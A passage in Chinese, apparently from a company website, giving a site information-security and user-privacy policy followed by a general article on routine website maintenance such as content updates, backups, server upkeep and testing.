ng)絡(luò)有害信息的清理整治工作，對(duì)違法犯罪案件，報(bào)告并協(xié)助公安機(jī)關(guān)查處。4、所有信息都及時(shí)做備份。按照國家有關(guān)規(guī)定，網(wǎng)站將保存3月內(nèi)系統(tǒng)運(yùn)行日志和用戶使用日志記錄。5、制定并遵守安全教育和培訓(xùn)制度。加大宣傳教育力度，增強(qiáng)用戶網(wǎng)絡(luò)安全意識(shí)，自覺遵守互聯(lián)網(wǎng)管理有關(guān)法律、法規(guī)，不泄密、不制作和傳播有害信息，不鏈接有害信息或網(wǎng)頁。三、用戶信息安全管理制度1、尊重并保護(hù)用戶的個(gè)人隱私，除了在與用戶簽署的隱私政策和網(wǎng)站服務(wù)條款以及其他公布的準(zhǔn)則規(guī)定的情況下，未經(jīng)用戶授權(quán)不會(huì)隨意公布與用戶個(gè)人身份有關(guān)的資料，除非有法律或程序要求。2、嚴(yán)格遵守網(wǎng)站用戶帳號(hào)使用登記和操作權(quán)限管理制度，對(duì)用戶信息專人管理，嚴(yán)格保密，未經(jīng)允許不得向他人泄露。定期對(duì)相關(guān)人員進(jìn)行網(wǎng)絡(luò)信息安全培訓(xùn)并進(jìn)行考核，使相關(guān)人員能夠充分認(rèn)識(shí)到網(wǎng)絡(luò)安全的重要性，嚴(yán)格遵守相應(yīng)規(guī)章制度。國安廣告將嚴(yán)格執(zhí)行本規(guī)章制度，并形成規(guī)范化管理，建立健全信息網(wǎng)絡(luò)安全小組。安全小組由單位領(lǐng)導(dǎo)負(fù)責(zé)，網(wǎng)絡(luò)技術(shù)、客戶服務(wù)等部門參加，并確定至少兩名安全負(fù)責(zé)人作為突發(fā)事件處理的聯(lián)系人。沈陽凱鴻科技有限公司2023/1/1

網(wǎng)站在建成后，長(zhǎng)期、艱巨的維護(hù)管理工作才剛剛開始，對(duì)一個(gè)完善的網(wǎng)站來說 日常維護(hù)與管理是很重要的，這樣網(wǎng)站才能長(zhǎng)期穩(wěn)定、高效地運(yùn)行在 Internet 上， 做好網(wǎng)站的 內(nèi)容、鏈接、布局、數(shù)據(jù)、系統(tǒng)、服務(wù)器等軟、硬件的日常維護(hù)與管理成為網(wǎng)站安全有效運(yùn)行 的基礎(chǔ)。 關(guān)鍵詞：網(wǎng)站；維護(hù)；管理；內(nèi)容；數(shù)據(jù) 網(wǎng)站好比是一份報(bào)紙或一臺(tái)節(jié)目，對(duì)其持續(xù)維護(hù)管理已成為一種日常性事務(wù)，然而很多網(wǎng) 站存在重建設(shè)、輕管理維護(hù)的通病。網(wǎng)站建成之后，會(huì)不可避免地遇到各種問題，只有不斷改 進(jìn)設(shè)計(jì)、創(chuàng)新更多的服務(wù)，及時(shí)地更新和豐富網(wǎng)站的內(nèi)容，展現(xiàn)網(wǎng)站的活力與發(fā)展，才能引起 訪客的興趣并產(chǎn)生信任感。本文從內(nèi)容更新、頁面布局更新和鏈接更新、數(shù)據(jù)管理和備份、操 作系統(tǒng)維護(hù)、服務(wù)器維護(hù)、設(shè)備維護(hù)和網(wǎng)站測(cè)試等方面展開論述。 1 內(nèi)容更新 內(nèi)容更新是網(wǎng)站管理的核心內(nèi)容。人們上網(wǎng)最關(guān)心的是有無需要的且可靠、新穎、實(shí)用的 信息，網(wǎng)站為保持時(shí)效性，要求網(wǎng)頁內(nèi)容新穎、有價(jià)值，創(chuàng)意好且有原創(chuàng)性，而且長(zhǎng)期堅(jiān)持更 新才會(huì)有吸引力。 比如新聞欄目更新，它是客戶了解網(wǎng)站的宣傳窗口，它將企業(yè)的重大活動(dòng)、產(chǎn)品的最新動(dòng) 態(tài)、企業(yè)的發(fā)展趨勢(shì)等及時(shí)、真實(shí)地呈現(xiàn)給客戶，讓訪問者覺得企業(yè)是一個(gè)發(fā)展良好并感興趣 的企業(yè)。還有商品信息更新，它是電子商務(wù)網(wǎng)站的主體，商務(wù)網(wǎng)站的魅力很大程度在于能源源 不斷地提供最新最及時(shí)的商品信息。另外如企業(yè)在線支持管理、在線購物管理、客戶信息管 理，以及廣告、論壇、留言板、郵箱等的更新維護(hù)等等。 穩(wěn)定的內(nèi)容更新還可以增加百度的收錄率，提高排名，更好地宣傳網(wǎng)站，樹立網(wǎng)站良好的 形象和知名度。 2 頁面布局更新和鏈接更新 頁面布局更新是很重要的，人們很重視第一印象，對(duì)頁面布局更新宜重新制作，不過網(wǎng)站 的 CI 應(yīng)不變?yōu)橐恕?保證網(wǎng)站的鏈接通暢，經(jīng)常對(duì)網(wǎng)站的鏈接進(jìn)行測(cè)試確保無誤。可以通過測(cè)試軟件對(duì)網(wǎng)站所 有的鏈接進(jìn)行測(cè)試，但最好還是用手工的方法進(jìn)行檢測(cè)，在網(wǎng)站正常運(yùn)行期間也要經(jīng)常使用瀏 覽器測(cè)試，查缺補(bǔ)漏。 3 數(shù)據(jù)管理和備份 數(shù)據(jù)是企業(yè)信息系統(tǒng)的核心內(nèi)容，是企業(yè)通過長(zhǎng)時(shí)間積累，通過特定的渠道收集的，具有 不可重現(xiàn)的特點(diǎn)，代表著原始的行為特征。網(wǎng)站后臺(tái)數(shù)據(jù)庫管理和維護(hù)主要包含如下： 查找數(shù)據(jù)丟失或被破壞的原因，如計(jì)算機(jī)硬件故障、軟件故障、病毒、人為誤操作、盜竊 等。 備份數(shù)據(jù)，主要是備份內(nèi)容和形式、由誰備份、存放的位置、備份頻率、備份方法等。 恢復(fù)數(shù)據(jù)，恢復(fù)是與備份對(duì)應(yīng)的操作，為了在系統(tǒng)出現(xiàn)異常情況時(shí)將數(shù)據(jù)恢復(fù)到某個(gè)正常 狀態(tài)。如果用戶數(shù)據(jù)庫出錯(cuò)，通過裝入最新的數(shù)據(jù)庫備份以及后來的事務(wù)日志備份可以恢復(fù)數(shù) 據(jù)庫。 監(jiān)視系統(tǒng)運(yùn)行狀況，及時(shí)處理系統(tǒng)錯(cuò)誤。主要是監(jiān)視當(dāng)前用戶以及進(jìn)程的信息、監(jiān)視數(shù)據(jù) 統(tǒng)計(jì)、監(jiān)視目標(biāo)占用空間情況，日常監(jiān)視的主要有：用戶數(shù)據(jù)庫、數(shù)據(jù)庫日志表以及計(jì)費(fèi)原始 數(shù)據(jù)表等。 保證系統(tǒng)數(shù)據(jù)安全，必須依據(jù)系統(tǒng)的實(shí)際情況，執(zhí)行一系列的安全保障措施。 4 操作系統(tǒng)維護(hù) 操作系統(tǒng)是一個(gè)非常開放而且脆弱的系統(tǒng)，稍微不慎就可能會(huì)導(dǎo)致系統(tǒng)受損，甚至癱瘓， 同時(shí)也要維護(hù)應(yīng)用服務(wù)器軟件和應(yīng)用軟件，經(jīng)常安裝與卸載應(yīng)用軟件的也會(huì)造成系統(tǒng)的運(yùn)行速 度降低、沖突增加等問題。 操作系統(tǒng)維護(hù)主要有：定期進(jìn)行磁盤碎片整理和文件掃描；維護(hù)系統(tǒng)注冊(cè)表；經(jīng)常性地備 份系統(tǒng)注冊(cè)表；清理無用的 DLL 文件；使用在線病毒檢測(cè)工具防止病毒入侵；優(yōu)化操作系統(tǒng) 本身；通過對(duì) Web 服務(wù)器的日志文件進(jìn)行分析和統(tǒng)計(jì)，掌握系統(tǒng)運(yùn)行情況以及網(wǎng)站內(nèi)容的受 訪問的情況，加強(qiáng)對(duì)整個(gè)網(wǎng)站及其內(nèi)容的維護(hù)和管理。 5 服務(wù)器維護(hù) 服務(wù)器有 web 服務(wù)器、郵件服務(wù)器、文件郵件服務(wù)器等，服務(wù)器運(yùn)行正常與否，決定了整 個(gè)網(wǎng)站功能的實(shí)現(xiàn)。服務(wù)器維護(hù)包括系統(tǒng)安裝、打補(bǔ)丁、升級(jí)；系統(tǒng)配置；系統(tǒng)檢查；系統(tǒng)優(yōu) 化；清潔、保養(yǎng)；覆蓋或升級(jí)安裝；故障判斷；故障處理；硬件維修或更換；系統(tǒng)參數(shù)調(diào)整； 垃圾文件及注冊(cè)表清理；內(nèi)存管理優(yōu)化；磁盤管理優(yōu)化；啟動(dòng)選項(xiàng)優(yōu)化；操作系統(tǒng)配置；網(wǎng)絡(luò) 配置；其他故障解決等，另外對(duì)服務(wù)器詳細(xì)地記下特別是故障記錄，常查看內(nèi)存占用情況、硬 盤剩余空間情況、CPU 占用率，原有的配置不能滿足要求時(shí)要進(jìn)行測(cè)試、升級(jí)等操作。6 設(shè)備維護(hù)和網(wǎng)站測(cè)試保證網(wǎng)絡(luò)交換機(jī)、路由器和防火墻等主干設(shè)備的正常運(yùn)轉(zhuǎn)，系統(tǒng)管理員必須做好網(wǎng)絡(luò)設(shè)備 的配置記錄，對(duì)每次的配置改動(dòng)作紀(jì)錄，并備份設(shè)備的配置文檔，記錄配置時(shí)間，系統(tǒng)管理員 要定期對(duì)硬盤進(jìn)行整理，清除緩存或垃圾文件，定期保存系統(tǒng)日志，做好系統(tǒng)的硬件維護(hù)以及 供電系統(tǒng)維護(hù)，對(duì)設(shè)備定期檢查、監(jiān)測(cè)，定期清潔、除塵，保證設(shè)備正常運(yùn)行。 網(wǎng)站測(cè)試主要有瀏覽器兼容測(cè)試、代碼測(cè)試、交互表單及數(shù)據(jù)查詢測(cè)試、客戶響應(yīng)測(cè)試、 功能測(cè)試、性能測(cè)試、運(yùn)行監(jiān)控、穩(wěn)定性測(cè)試、安全測(cè)試等。 7 結(jié)語 建立一個(gè)完善的網(wǎng)站不僅僅是只要網(wǎng)站的功能完善、操作界面美觀就行了，一個(gè)完善的網(wǎng) 站是需要不斷進(jìn)行維護(hù)與管理。只有長(zhǎng)期不斷的對(duì)網(wǎng)站進(jìn)行日常維護(hù)與管理，才能建立健全網(wǎng) 站，才能高效運(yùn)行，才有生命力。